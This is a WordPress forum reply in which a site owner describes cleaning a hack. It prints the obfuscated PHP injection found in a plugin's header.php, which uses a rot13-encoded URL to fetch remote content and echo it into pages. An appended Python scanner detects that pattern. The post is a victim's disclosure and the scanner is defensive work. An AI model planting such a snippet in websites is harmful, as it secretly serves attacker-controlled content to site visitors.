Forum Replies Created

Viewing 1 replies (of 1 total)
  • Thread Starter Enyalios

    (@enyalios)

    Thanks for your reply. You didn't see it because I managed to get it fixed! Here is how:

    My theme is using the cherry framework plugin. Apparently what was compromised was not in the theme folder but the cherry framework one. In the header.php I found this:

    <?php $url = str_rot13('uggc://scrq8.bet/flfgrz/yvaxbixn.cuc?qbabe=');if(!$SESSION['dsfdsfdsf']){if (function_exists('curl_version')){$handle = curl_init();curl_setopt($handle, CURLOPT_URL, $url . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]);curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE);$adasd = curl_exec($handle);$SESSION['dsfdsfdsf'] = $adasd;echo $adasd;curl_close($handle);} else{$SESSION['dsfdsfdsf'] = file_get_contents($url . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]);echo $SESSION['dsfdsfdsf'];} }else{ echo $SESSION['dsfdsfdsf']; echo"<!--session--->";} ?>

    Checking the dates does not really help since we have had to do a lot of cleaning which changed the dates anyway. I checked the rest of the files in that folder and it seems they are ok.

    Now I am left wondering why the antivirus plugins didn't check there and the hack was left undetected, and what else might have been compromised that I don't know about.
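
Added example, not part of the original post: a small Python scanner for the pattern shown above, a `str_rot13()` call on a string literal that decodes to a URL, run over every `.php` file under a directory so plugin folders are covered as well as the theme. The function names `scan_source` and `scan_tree` are hypothetical, the sample input is constructed (it uses `example.invalid`), and recording `curl_exec` / `file_get_contents` calls in the same file goes slightly beyond the single case in the post.

```python
import codecs
import re
import sys
from pathlib import Path

# str_rot13('...') or str_rot13("...") called on a string literal.
ROT13_CALL = re.compile(r"""str_rot13\(\s*(['"])(.*?)\1\s*\)""", re.S)
# PHP calls that fetch remote content, as the injected snippet does.
FETCHERS = re.compile(r"\b(curl_exec|file_get_contents)\s*\(")
URL = re.compile(r"^(https?|ftp)://", re.I)

def scan_source(text):
    """Return one finding per str_rot13() literal in a PHP source string."""
    findings = []
    for m in ROT13_CALL.finditer(text):
        decoded = codecs.decode(m.group(2), "rot13")
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "is_url": bool(URL.match(decoded)),
            "fetches": sorted(set(FETCHERS.findall(text))),
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root and map path -> findings."""
    results = {}
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        hits = scan_source(text)
        if hits:
            results[str(path)] = hits
    return results

# Constructed sample, modelled on the shape of the snippet in the post.
SAMPLE = ("<?php $url = str_rot13('%s');"
          "$h = curl_init(); curl_setopt($h, CURLOPT_URL, $url);"
          "echo curl_exec($h); ?>"
          % codecs.encode("http://example.invalid/x.php?d=", "rot13"))

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else None
    report = scan_tree(root) if root else {"<sample>": scan_source(SAMPLE)}
    for name, hits in report.items():
        for h in hits:
            kind = "URL" if h["is_url"] else "text"
            print(f"{name}:{h['line']}: rot13 {kind} -> {h['decoded']} fetch={h['fetches']}")
```

Run it with the path to the `wp-content` directory as the only argument; with no argument it scans the constructed sample. A hit with `is_url` set in a file that also calls a fetch function is the combination worth reviewing by hand.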
